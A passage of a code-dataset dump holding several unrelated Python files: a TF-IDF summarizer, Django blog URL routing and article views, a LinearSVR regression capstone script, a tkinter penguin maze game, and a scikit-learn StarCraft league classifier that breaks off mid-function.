word in blob)\n\ndef idf(word, bloblist):\n return math.log(len(bloblist) / (1 + n_containing(word, bloblist)))\n\ndef tfidf(word, blob, bloblist):\n return tf(word, blob) * idf(word, bloblist)\n\ndef summarize(document1):\n document1 = tb(document1)\n bloblist = document1.sentences\n relevance_scores = []\n relevancy = {}\n for i, blob in enumerate(bloblist):\n # print \"Top words in sentence \" + str(i)\n scores = {word: tfidf(word, blob, bloblist) for word in blob.words}\n sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)\n relevance = 0\n sum_relevancy = 0\n for word, score in sorted_words:\n # print \"\\tWord: {}, TF-IDF: {}\".format(word, score)\n sum_relevancy += score\n relevance = sum_relevancy/len(sorted_words)\n relevance_scores.append(relevance)\n relevancy[str(i)] = relevance\n\n relevance_scores.sort(reverse=True)\n\n final_sentences = []\n num_top_results = 3\n if len(bloblist) < 3:\n num_top_results = 1\n for s in range(0, len(relevance_scores[:num_top_results])):\n for key in relevancy:\n if relevancy[key] == relevance_scores[s]:\n final_sentences.append(int(key))\n\n final_sentences.sort()\n final_text = \"\"\n for x in range(0, len(final_sentences)):\n if x != 0:\n final_text += \" \" + str(document1.sentences[final_sentences[x]]).replace('\\n', '')\n else:\n final_text = str(document1.sentences[final_sentences[x]]).replace('\\n', '')\n\n return str(final_text)\n","sub_path":"summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} 
+{"seq_id":"458215996","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\n# Feed:\nfrom feeds import *\n\n# Sitemap\nfrom django.contrib.sitemaps import FlatPageSitemap, GenericSitemap\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom blog.models import *\n\nsite_feeds = {\n\t'rss': RssLatestEntries,\n\t'atom': AtomLatestEntries,\n}\n\nentry_info_dict = {\n\t\"queryset\": Post.objects.all(), \n\t\"date_field\": 'pub_date',\n}\n\nsitemaps = {\n\t\"flatpages\": FlatPageSitemap,\n\t\"post\": GenericSitemap(entry_info_dict, priority = 0.5),\n}\n\nurlpatterns = patterns('',\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs' \n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^$', include('blog.urls')),\n (r'^admin/(.*)', admin.site.root),\n\t(r'^grappelli/', include('grappelli.urls')),\n\t(r'^comments/', include('django.contrib.comments.urls')),\n\t(r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap', {'sitemaps': sitemaps}),\n\t(r'^feeds/(?P.*)/$', 'django.contrib.syndication.views.feed',{'feed_dict':site_feeds}),\n\t(r'medias/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n\t(r'^media/admin/(?P.*)$', 'django.views.static.serve', {'document_root': settings.ADMIN_MEDIA_ROOT}),\n (r'^tags/(?P[a-zA-Z0-9_\\-]+)/$', 'blog.views.tags_posts_list'),\n (r'posts/', include('blog.urls')),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"6626393","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 14 15:06:10 2018\r\n\r\n@author: jschroeder\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom datetime import timedelta\r\n\r\n'''\r\nREAD ME:\r\n \r\nThis file contains the workflow for testing and tuning the models, including\r\nthe final model, Linear SVR.\r\n\r\nThe data for this model was generated on my Macbook Pro using the scripts:\r\n google_trends.py\r\n data_wrangling_enhanced.py\r\n combine_google_demo.py\r\n \r\nWhile working between computers, the filenames and setup may change, but the data\r\nand the project remain the same. 
\r\n\r\nYou may find the rough draft of my early model testing at regression_selection.py\r\n\r\nThe .csv files included in this directory serve as examples of the data used during\r\nthis project.\r\n full_dataset_bystate.csv - the parsed ASCII demographic file\r\n test_google_bank_account.csv - the parsed Google Trends data\r\n bank_account.csv - the combined file (named final_dataset.csv in the combine script)\r\n\r\n\r\n'''\r\n\r\n\r\n# read in the final dataset produced from combine_google_demo.py\r\ndf = pd.read_csv('C:\\\\Users\\\\jschroeder\\\\Documents\\\\Internal\\\\Training\\\\bank_account.csv', index_col='Year', parse_dates=True)\r\n\r\nyear_set_previous = set(df.index.year)\r\n\r\ndf['bank account previous'] = ''\r\n\r\nfor y in df.index.unique(): \r\n if y.year != 2004:\r\n \r\n if ((y.year - 2001) % 4) == 0:\r\n df['bank account previous'][df.index == y] = df.loc[y - timedelta(days=366), 'bank account']\r\n # print(df.loc[y - timedelta(days=366), 'bank account previous']) \r\n else:\r\n df['bank account previous'][df.index == y] = df.loc[y - timedelta(days=365), 'bank account']\r\n # print(df.loc[y - timedelta(days=365), 'bank account previous'])\r\n\r\ndf = df.loc['2005':, :]\r\n\r\ndf['bank account previous'] = df['bank account previous'].astype('float')\r\n\r\ndf.rename(columns={'bank account' : 'bank account copy'}, inplace=True)\r\n\r\ndf['bank account'] = df['bank account copy']\r\n\r\ndel df['bank account copy']\r\n\r\ndel df['State']\r\n\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\n\r\ntscv = TimeSeriesSplit()\r\nX = df.iloc[:, :-1].as_matrix()\r\ny = df.iloc[:, -1].as_matrix()\r\n\r\n\r\nfor train_index, test_index in tscv.split(X):\r\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = X[train_index], X[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.svm import LinearSVR\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\n# tuning the hyperparameters\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\n# credit: https://medium.com/@aneesha/svm-parameter-tuning-in-scikit-learn-using-gridsearchcv-2413c02125a0\r\ndef linearsvr_param_selection(X_train, y_train, pipeline):\r\n param_grid = {\r\n 'linreg__C': np.linspace(0.001, 10, num=100),\r\n 'linreg__loss' : ['epsilon_insensitive', 'squared_epsilon_insensitive'],\r\n 'linreg__fit_intercept' : [True, False]\r\n }\r\n grid_search = GridSearchCV(pipeline, param_grid, cv=tscv)\r\n grid_search.fit(X_train, y_train)\r\n grid_search.best_params_\r\n return grid_search\r\n\r\n\r\n# Setup the pipeline steps: steps\r\nsteps = [('scaler', StandardScaler()),\r\n ('linreg', LinearSVR())]\r\n\r\npipeline = Pipeline(steps)\r\n\r\npipeline.fit(X_train, y_train)\r\n\r\nmodel = linearsvr_param_selection(X_train, y_train, pipeline)\r\n\r\nmodel = model.fit(X_train, y_train)\r\n\r\ny_pred = model.predict(X_test)\r\n\r\n# Compute and print R^2 and RMSE\r\n# print(\"Optimal alpha: {}\".format(param_dict['alpha']))\r\nprint(\"R^2: {}\".format(model.score(X_test, y_test)))\r\nprint(\"Mean Squared Error: {}\".format(mean_squared_error(y_test, y_pred)))\r\n\r\nprint(model)\r\n\r\nprint(\"\"\"\r\n \r\n\r\n The coefficients of the features are:\r\n {}\r\n\r\n\"\"\".format(model.estimator.named_steps['linreg'].coef_))\r\n\r\ncoef = 
model.estimator.named_steps['linreg'].coef_\r\n\r\ncoef_index_sorted = coef.argsort()[-4:-1][::-1]\r\n\r\ncoef_index_sorted_desc = coef.argsort()[:3][::1]\r\n\r\ndemo_dict = {\r\n 0 : '<1', \r\n 1 : '1-4', \r\n 2 : '5-9', \r\n 3 : '10-14', \r\n 4 : '15-19', \r\n 5 : '20-24', \r\n 6 : '25-29', \r\n 7 : '29-34', \r\n 8 : '35-39', \r\n 9 : '40-44',\r\n 10 : '45-49',\r\n 11 : '49-54',\r\n 12 : '55-59',\r\n 13 : '60-64',\r\n 14 : '65-69',\r\n 15 : '70-74',\r\n 16 : '75-79',\r\n 17 : '80-84',\r\n 18 : '85+',\r\n 19 : 'Last Year Keyword Data'\r\n }\r\n\r\ntop_three = []\r\nbottom_three = []\r\n\r\nfor item in coef_index_sorted:\r\n top_three.append(item)\r\n \r\nfor item in coef_index_sorted_desc:\r\n bottom_three.append(item)\r\n\r\n\r\nprint(\"\"\"\r\n \r\n Demographics are sorted into 19 age groups:\r\n 1. <1 11. 45-49\r\n 2. 1-4 12. 49-54 \r\n 3. 5-9 13. 55-59\r\n 4. 10-14 14. 60-64\r\n 5. 15-19 15. 65-69\r\n 6. 20-24 16. 70-74\r\n 7. 25-29 17. 75-79\r\n 8. 29-34 18. 80-84 \r\n 9. 35-39 19. 85+\r\n 10. 40-44 \r\n \r\n \r\n Top 3 positively correlated demographics: \r\n {}, {}, {}\r\n \r\n Bottom 3 negatively correlated demographics:\r\n {}, {}, {}\r\n \r\n \"\"\".format(demo_dict[top_three[0]], \r\n demo_dict[top_three[1]], \r\n demo_dict[top_three[2]], \r\n demo_dict[bottom_three[0]],\r\n demo_dict[bottom_three[1]],\r\n demo_dict[bottom_three[2]]))\r\n\r\nprint(coef_index_sorted)\r\nprint(coef[coef_index_sorted])\r\nprint(coef_index_sorted_desc)\r\nprint(coef[coef_index_sorted_desc])\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"capstone_project/final/Capstone_Final_Project.py","file_name":"Capstone_Final_Project.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"60736561","text":"import tkinter\n\n#input key\nkey = \"\"\nkoff = False\ndef key_down(e):\n global key,koff\n key = e.keysym\n koff = False\n \ndef key_up(e):\n global koff\n koff = True\n \nDIR_UP = 0\nDIR_DOWN = 1\nDIR_LEFT =2\nDIR_RIGHT = 3\n\npen_x = 90\npen_y = 90\n\nmap_data = [\n [0,1,1,1,1,0,0,1,1,1,1,0],\n [0,2,3,3,2,1,1,2,3,3,2,0],\n [0,3,0,0,3,3,3,3,0,0,3,0],\n [0,3,1,1,3,0,0,3,1,1,3,0],\n [0,3,2,2,3,0,0,3,2,2,3,0],\n [0,3,0,0,3,1,1,3,0,0,3,0],\n [0,3,1,1,3,3,3,3,1,1,3,0],\n [0,2,3,3,2,0,0,2,3,3,2,0],\n [0,0,0,0,0,0,0,0,0,0,0,0]\n]\n\n\ndef draw_screen(): #open game monitor\n canvas.delete(\"SCXREEN\")\n for y in range(9):\n for x in range(12):\n canvas.create_image(x*60+30, y*60+30, image=img_bg[map_data[y][x]], tag = \"SCREEN\")\n canvas.create_image(pen_x, pen_y, image=img_pen, tag = \"SCREEN\")\n\n\ndef check_wall(cx, cy, di):#each direction\"s wall is searching\n chk = False\n if di == DIR_UP:\n mx = int(cx/60)\n my = int((cy-60)/60)\n if map_data[my][mx] <= 1:\n chk = True\n if di == DIR_DOWN:\n mx = int(cx/60)\n my = int((cy+60)/60)\n if map_data[my][mx] <= 1:\n chk = True\n if di == DIR_LEFT:\n mx = int((cx-60)/60)\n my = int(cy/60)\n if map_data[my][mx] <= 1:\n chk = True\n if di == DIR_RIGHT:\n mx = int((cx+60)/60)\n my = int(cy/60)\n if map_data[my][mx] <= 1:\n chk = True\n return chk\n\n\ndef move_penpen(): #move penpen\n global pen_x, pen_y\n if key == \"Up\":\n if check_wall(pen_x, pen_y, DIR_UP) == False:\n pen_y = pen_y-60\n if key == \"Down\":\n if check_wall(pen_x, pen_y, DIR_DOWN) == False:\n pen_y = pen_y + 60\n if key == \"Left\":\n if check_wall(pen_x, pen_y, DIR_LEFT) == False:\n pen_x = pen_x - 60\n if key == \"Right\":\n if check_wall(pen_x, pen_y, DIR_RIGHT) == False:\n pen_x = pen_x + 60\n \n \ndef main(): 
#main loop\n    global key, koff\n    draw_screen()\n    move_penpen()\n    if koff == True:\n        key = \"\"\n        koff = False\n    root.after(300,main)\n\n\nroot = tkinter.Tk()\n\nimg_bg = [\n    tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip00.png\"),\n    tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip01.png\"),\n    tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip02.png\"),\n    tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip03.png\")\n]\nimg_pen = tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/pen03.png\")\n\nroot.title(\"HARAHARA penguin rabilince\")\nroot.resizable(False,False)\nroot.bind(\"<KeyPress>\", key_down)\nroot.bind(\"<KeyRelease>\", key_up)\ncanvas = tkinter.Canvas(width=720,height=540)\ncanvas.pack()\nmain()\nroot.mainloop()\n","sub_path":"game_development_tutorial_by_python/list0303_1.py","file_name":"list0303_1.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"280534961","text":"from django.http import HttpResponseForbidden,HttpResponseRedirect,Http404, HttpResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Article,Category,Comment\nfrom django.db.models import Q\nfrom django.views.generic import ListView,DetailView,CreateView,UpdateView,DeleteView,RedirectView\nfrom django.urls import reverse_lazy,reverse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.paginator import Paginator,PageNotAnInteger, EmptyPage\nfrom django.core.exceptions import PermissionDenied\nfrom django.views.generic.edit import FormMixin\nfrom .filters import ArticleFilter, CategoryArticleFilter\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom django.contrib import messages\n\n\n\nclass article_list(ListView):\n    model = Article\n    template_name='articles/article_list.html'\n    context_object_name = 'articles'\n    paginate_by=15 \n    \n\n    def get_queryset(self):\n        queryset = super(article_list, self).get_queryset()\n        queryset = queryset.filter(approved=True)\n        return queryset \n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['categories']=Category.objects.all() \n        return context\n    \n    \n\nclass article_detail(FormMixin,LoginRequiredMixin,DetailView):\n    login_url='/accounts/login/'\n    model=Article\n    template_name='articles/article_detail.html'\n    context_object_name = 'article'\n    form_class=CommentForm\n    \n\n\n    def get_queryset(self):\n        queryset = super(article_detail, self).get_queryset()\n        queryset = queryset.filter(approved=True)\n        return queryset\n\n\n    def get_success_url(self):\n        return reverse('articles:detail', kwargs={\"pk\": self.object.pk})\n    \n    def get_context_data(self, **kwargs):\n        context = super(article_detail, self).get_context_data(**kwargs)\n        context['categories']=Category.objects.all()\n        context['comments'] = self.object.comments.filter()[:15] \n        context['tags'] = self.object.tags.similar_objects()[:10]\n        context['form']=self.get_form() \n        return context\n\n    def post(self, request, *args, **kwargs):\n        self.object = 
self.get_object()\n form = self.get_form()\n if form.is_valid():\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n def form_valid(self, form): \n new_comment = form.save(commit=False)\n new_comment.post = self.get_object()\n new_comment.name=self.request.user\n form.save()\n return super(article_detail,self).form_valid(form)\n \n \nclass article_create(SuccessMessageMixin,LoginRequiredMixin,CreateView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_create.html' \n fields=['title','body','thumb','category','tags']\n success_message='Thank You! Your Post will be published once the Admin has approved it!'\n\n\n\n def get_success_url(self):\n return reverse('articles:list')\n\n def form_valid(self,form):\n form.instance.author=self.request.user\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n context = super(article_create, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n return context\n\n\nclass article_edit(SuccessMessageMixin,LoginRequiredMixin,UpdateView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_edit.html'\n fields=['title','body','thumb']\n success_message='Your Article has been edited successfully' \n\n def get_queryset(self):\n queryset = super(article_edit, self).get_queryset()\n queryset = queryset.filter(approved=True)\n return queryset \n\n def dispatch(self, request, *args, **kwargs): # new\n obj = self.get_object()\n if obj.author != self.request.user:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(article_edit, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n return context\n\n\nclass article_delete(SuccessMessageMixin,LoginRequiredMixin,DeleteView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_delete.html'\n success_url=reverse_lazy('articles:list')\n\n\n def get_queryset(self):\n queryset = super(article_delete, self).get_queryset()\n queryset = queryset.filter(approved=True)\n return queryset\n\n def dispatch(self, request, *args, **kwargs): # new\n obj = self.get_object()\n if obj.author != self.request.user:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(article_delete, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n return context\n \n\n\nclass categorywise_list(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles' \n paginate_by=15 \n\n def get_queryset(self):\n queryset = super(categorywise_list, self).get_queryset()\n queryset = queryset.filter(approved=True,category_id=self.kwargs['item_id'])\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super(categorywise_list, self).get_context_data(**kwargs) \n context['categories']=Category.objects.all()\n return context\n\n\n\ndef about(request):\n categories=Category.objects.all()\n return render(request, 'articles/about.html',{'categories':categories})\n\n@login_required(login_url=\"/accounts/login/\")\ndef comment_delete(request,pk):\n comment = get_object_or_404(Comment,pk=pk)\n article=comment.post \n if comment.name==request.user: \n comment.delete()\n return HttpResponseRedirect(reverse('articles:detail', kwargs={'pk':article.pk}))\n else:\n return HttpResponse('
    Invalid Request
    ')\n \n return render(request,'articles/article_detail')\n\n\ndef article_search(request):\n query=request.GET.get('q')\n results = Article.objects.filter(Q(title__icontains=query) | Q(body__icontains=query) | Q(category__categorize__icontains=query) | Q(author__username__icontains=query))\n categories = Category.objects.all() \n messages.success(request, 'Total Results found :') \n paginator=Paginator(results,15)\n page = request.GET.get('page')\n try:\n articles = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer deliver the first page\n articles = paginator.page(1)\n except EmptyPage:\n # If page is out of range deliver last page of results\n articles = paginator.page(paginator.num_pages)\n return render(request, 'articles/article_search.html', { 'articles': articles , 'categories':categories ,'query':query, 'results':results } )\n\n\nclass article_like_toggle(LoginRequiredMixin,RedirectView):\n login_url='/accounts/login/'\n def get_redirect_url(self, *args, **kwargs):\n pk=self.kwargs.get('pk') \n obj=get_object_or_404(Article,pk=pk)\n print(obj.title)\n url_ = obj.get_absolute_url()\n user = self.request.user \n if user in obj.likes.all():\n obj.likes.remove(user)\n else:\n obj.likes.add(user)\n return url_\n\n\n\nclass article_like_api_toggle(APIView): \n authentication_classes = [authentication.SessionAuthentication,]\n permission_classes = [permissions.IsAuthenticated,]\n\n def get(self, request,pk=None, format=None): \n \n obj=get_object_or_404(Article,pk=pk)\n \n url_ = obj.get_absolute_url()\n user = self.request.user\n updated = False\n liked = False\n\n if user in obj.likes.all():\n liked=False\n obj.likes.remove(user)\n else:\n liked=True\n obj.likes.add(user)\n updated=True \n data = {\n \"updated\":updated, \"liked\":liked\n } \n \n return Response(data)\n\nclass sort_by_like(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles'\n paginate_by=15\n\n def get_queryset(self):\n queryset = super(sort_by_like, self).get_queryset()\n queryset = queryset.annotate(like_count=Count('likes')).order_by('-like_count')\n queryset = queryset.filter(approved=True)\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs) \n context['categories']=Category.objects.all() \n return context\n\n\n\nclass sort_by_date(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles'\n paginate_by=15\n\n def get_queryset(self):\n queryset = super(sort_by_date, self).get_queryset()\n queryset = queryset.filter(approved=True).order_by('date') \n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs) \n context['categories']=Category.objects.all() \n return context\n\n\n","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"595807435","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier\nfrom sklearn.naive_bayes import BernoulliNB, GaussianNB, MultinomialNB\nfrom sklearn.neural_network import BernoulliRBM, MLPClassifier, MLPRegressor\nfrom sklearn.exceptions import UndefinedMetricWarning\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nimport sys\nfrom sklearn.model_selection import train_test_split, 
cross_val_score\nimport numpy as np\nimport warnings\nfrom functools import reduce\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\n\n\nclass LastUpdatedOrderedDict(OrderedDict):\n \"Store items in the order the keys were last added.\"\n\n def __setitem__(self, key, value):\n if key in self:\n del self[key]\n OrderedDict.__setitem__(self, key, value)\n\n\n# GLOBALS\nLOGGING = True # verbose logging output\nSPLIT_DATA = 0.2 # split dataset into training and testdata\nDATAFRAME = None # our dataframe\nMISSING_VALUES = 'delete' # how to deal with missing values (delete, mean, median, most_frequent)\nSIGNIFICANT_COLS = False # significant columns only (like APM, PACs, #Hotkeys)\nNUMBER_OF_RUNS = 10\nEXPORT_PLOT = False\nX_LABEL = 'hidden layer sizes'\nPLOT_FILE_NAME = 'figures/neural_network_2.png'\n\n# change the classifier values here!\nALGORITHMS = ['bayes'] #algorithms to use ['forest', 'knn', 'bayes', 'neural']\nalgorithmParameter = (5, 5+1, 5) # set a parameter in range(start, end, jump)\n\n# forest params (algorithmParameter controls n_estimators)\nforestCriterion = 'gini' # \"gini\" (default) for the Gini impurity 2) \"entropy\" for the information gain.\nforestMaxDepth = None # how deep can a tree be max; default: none\n\n# knn params (algorithmParameter control n_neighbors)\nknnWeights = 'uniform' # weights: 1) 'uniform' (default): weighted equally. 2) 'distance': closer neighbors => more influence\nknnAlgorithm = 'brute' # algorithm to compute the NN: {'ball_tree', 'kd_tree', 'brute', 'auto}\n\n# bayes params TODO\n\n# neural MLP params (algorithmParameter controls hidden_layer_sizes, default: (100,))\nneuralActivation = 'relu' # (activation function for the hidden layer) : {‘identity’, ‘logistic’, ‘tanh’, ‘relu’}, default ‘relu’\nneuralSolver = 'adam' # (for the weight optimization): {‘lbfgs’, ‘sgd’, ‘adam’}, default ‘adam’\nneuralLearningRate = 'constant'# (Learning rate schedule for weight updates).: {‘constant’, ‘invscaling’, ‘adaptive’}, default ‘constant’\nneuralMaxIter = 200 # max_iter : int, optional, default 200\n\n# filter warnings of the type UndefinedMetricWarning\nwarnings.filterwarnings(\"ignore\", category=UndefinedMetricWarning)\n\ndef main():\n readDataset()\n handleMissingValues()\n classifiers = getClassifiers()\n trainAndPredict(classifiers)\n\n\ndef readDataset():\n global DATAFRAME\n # csv => DataFrame\n DATAFRAME = pd.read_csv('datasets/SkillCraft1_Dataset.csv')\n printlog('dataset size:' + str(DATAFRAME.shape))\n\n\ndef handleMissingValues():\n global DATAFRAME\n if (MISSING_VALUES == 'delete'):\n # filter out missing values\n # https://stackoverflow.com/questions/27428954/drop-row-if-any-column-value-does-not-a-obey-a-condition-in-pandas\n DATAFRAME = DATAFRAME[~(DATAFRAME == '?').any(1)]\n\n if (MISSING_VALUES == 'median' or MISSING_VALUES == 'mean' or MISSING_VALUES == 'most_frequent'):\n # deal with missing values => mean\n DATAFRAME.replace({'?': np.nan}, inplace=True)\n fill_NaN = preprocessing.Imputer(missing_values='NaN', strategy=MISSING_VALUES, axis=0)\n imputed_DF = pd.DataFrame(fill_NaN.fit_transform(DATAFRAME))\n imputed_DF.columns = DATAFRAME.columns\n imputed_DF.index = DATAFRAME.index\n DATAFRAME = imputed_DF\n printlog('dataset size after handling missing values:' + str(DATAFRAME.shape))\n\n\ndef trainAndPredict(classifiers):\n resultsPerClassifier = LastUpdatedOrderedDict()\n for (model, name) in classifiers:\n resultsPerClassifier[name] = []\n for i in range (0, NUMBER_OF_RUNS):\n # split into 80% training data, 20% 
test data\n train, test = train_test_split(DATAFRAME, test_size=SPLIT_DATA)\n\n # get training & test samples/targets\n training_samples, training_target = getSamplesAndTargets(train)\n test_samples, actual_leagues = getSamplesAndTargets(test)\n\n for (model, name) in classifiers:\n # for each classifier, do the training and evaluation\n model.fit(training_samples, training_target)\n\n # predict the samples\n predicted_leagues = model.predict(test_samples)\n\n # perform cross validation\n X, y = getSamplesAndTargets(DATAFRAME)\n crossScoresPrecision = cross_val_score(model, X, y, cv=10, scoring='recall_weighted')\n crossScoresRecall = cross_val_score(model, X, y, cv=10, scoring='precision_weighted')\n crossScoresF1 = cross_val_score(model, X, y, cv=10, scoring='f1_weighted')\n crossScoresAccuracy = cross_val_score(model, X, y, cv=10, scoring='accuracy')\n\n # summarize the fit of the model\n crossScoresMean = (crossScoresPrecision.mean(), crossScoresRecall.mean(), crossScoresF1.mean(), crossScoresAccuracy.mean())\n crossScoresStd = (crossScoresPrecision.std() * 2, crossScoresRecall.std() * 2, crossScoresF1.std() * 2, crossScoresAccuracy.std() * 2)\n printResults(crossScoresMean, crossScoresStd, actual_leagues, predicted_leagues, name)\n resultsPerClassifier[name].append(\n crossScoresMean)\n #(metrics.precision_recall_fscore_support(actual_leagues, predicted_leagues, average='weighted'))\n\n printClassifierReport(resultsPerClassifier)\n if EXPORT_PLOT:\n printPlot(resultsPerClassifier)\n\n\ndef getClassifiers():\n # add the various classifiers\n classifiers = []\n for i in range(*algorithmParameter):\n if \"forest\" in ALGORITHMS:\n name = \"Random Forests (n={0})\".format(i)\n classifiers.append(\n # n_estimators: number of trees in the forest, default: 10\n # criterion: 1) \"gini\" (default) for the Gini impurity 2) \"entropy\" for the information gain.\n # max_depth: how deep can a tree be max; default: none\n (RandomForestClassifier(n_estimators=i, criterion=forestCriterion, max_depth=forestMaxDepth), name))\n if \"knn\" in ALGORITHMS:\n name = \"kNN (n={0})\".format(i)\n classifiers.append(\n # n_neighbors: number of neighbours to use, default: 5\n # weights: 1) 'uniform' (default): weighted equally. 
2) 'distance': closer neighbors => more influence\n # algorithm to compute the NN: 1) 'ball_tree' will use BallTree 2) 'kd_tree' will use KDTree\n (KNeighborsClassifier(n_neighbors=i, weights=knnWeights, algorithm=knnAlgorithm), name))\n if \"bayes\" in ALGORITHMS:\n name = \"Naive Bayes (priors={0})\".format('None')\n classifiers.append(\n # priors: prior probabilities of the classes; default: 'none'\n (GaussianNB(priors=None), name))\n if \"neural\" in ALGORITHMS:\n name = \"Neural Network (layers={0})\".format(i)\n classifiers.append(\n # hidden_layer_sizes (ith element = number of neurons in the ith hidden layer), default: (100,)\n # activation (activation function for the hidden layer) : {‘identity’, ‘logistic’, ‘tanh’, ‘relu’}, default ‘relu’\n # solver (for the weight optimization): {‘lbfgs’, ‘sgd’, ‘adam’}, default ‘adam’\n # learning_rate (Learning rate schedule for weight updates).: {‘constant’, ‘invscaling’, ‘adaptive’}, default ‘constant’\n # max_iter : int, optional, default 200\n (MLPClassifier(hidden_layer_sizes=(i, ), activation=neuralActivation, solver=neuralSolver,\n learning_rate=neuralLearningRate, max_iter=neuralMaxIter), name))\n return classifiers\n\ndef getSamplesAndTargets(data):\n if (SIGNIFICANT_COLS):\n # select only some of the most significant columns\n samples = data[['NumberOfPACs','ActionLatency','SelectByHotkeys','AssignToHotkeys', 'APM']]\n else:\n # get training samples (without LeagueIndex and GameID\n samples = data.drop(['GameID', 'LeagueIndex'], axis=1)\n\n # get training target (LeagueIndex)\n targets = data['LeagueIndex'].values\n return samples, targets\n\n\ndef printResults(crossScoresMean, crossScoresStd, actual_leagues, predicted_leagues, classifier):\n print(\"\\n\", \"=\" * 80, \"\\n\")\n print(\"=== Classifier:\", classifier, \"===\\n\")\n print(\"=== Classification Report: ===\\n\"\n \"precision (How many selected elements are relevant?): TP / (TP + FP)\\n\"\n \"recall (How many relevant elements are selected?): TP / (TP + FN)\\n\"\n \"f1 score to measure a test's accuracy (considers both precision and recall): 2*((PR * RC)/(PR + RC))\\n\"\n \"support: #elements in this class\\n\", metrics.classification_report(actual_leagues, predicted_leagues))\n print(\"=== Cross Validation Results: ===\\n\",\n \"Precision: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[0], crossScoresStd[0]),\n \"Recall: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[1], crossScoresStd[1]),\n \"F1 Score: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[2], crossScoresStd[2]),\n \"Accuracy: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[3], crossScoresStd[3]))\n print(\"=== Confusion Matrix: ===\\n\"\n \"top: predicted values, left: actual values\\n\",\n metrics.confusion_matrix(actual_leagues, predicted_leagues))\n print()\n # here we can use 'weighted' or 'macro' => weighted adjusts for the number of instances per label\n # print(\"f1-score: %0.2f\" % metrics.f1_score(actual_leagues, predicted_leagues, average='weighted'))\n # print(\"recall-score: %0.2f\" % metrics.recall_score(actual_leagues, predicted_leagues, average='weighted'))\n # print(\"precision-score: %0.2f\" % metrics.precision_score(actual_leagues, predicted_leagues, average='weighted'))\n # print(\"accuracy-score: %0.2f\" % metrics.accuracy_score(actual_leagues, predicted_leagues))\n\n\ndef printClassifierReport(resultsPerClassifier):\n print()\n print(\"=\" * 80)\n print(\"=== Report per Classifier: ===\")\n 